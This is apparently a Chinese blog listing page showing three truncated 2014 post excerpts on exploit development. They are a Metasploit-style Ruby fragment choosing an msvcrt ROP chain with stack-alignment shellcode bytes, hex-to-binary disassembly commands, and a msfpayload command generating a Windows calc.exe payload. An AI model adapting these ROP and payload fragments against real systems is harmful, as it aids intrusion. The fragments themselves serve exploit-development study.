摘要: 111 def get_payload(t)112 if t['Rop'] == :msvcrt113 print_status("Using msvcrt ROP")114 esp_align = "\x81\xc4\x54\xf2\xff\xff"115 ... 阅读全文
posted @ 2014-07-01 15:29 Daniel King 阅读(551) 评论(0) 推荐(0) 编辑
摘要: cat ascii.hex | ascii2binary -b h -t us > ascii.bin x86dis -e 0 -s att -f ascii.bin echo "d8 01 77 c4 90 90 90 90" | ascii2binary -b h -t uc | x86d... 阅读全文
posted @ 2014-07-01 13:41 Daniel King 阅读(207) 评论(0) 推荐(0) 编辑
摘要: daniel@daniel-mint ~/msf/metasploit-framework $ ruby msfpayload windows/exec CMD=calc.exe CWARNING: Nokogiri was built against LibXML version 2.8.0, b... 阅读全文
posted @ 2014-07-01 11:23 Daniel King 阅读(770) 评论(0) 推荐(0) 编辑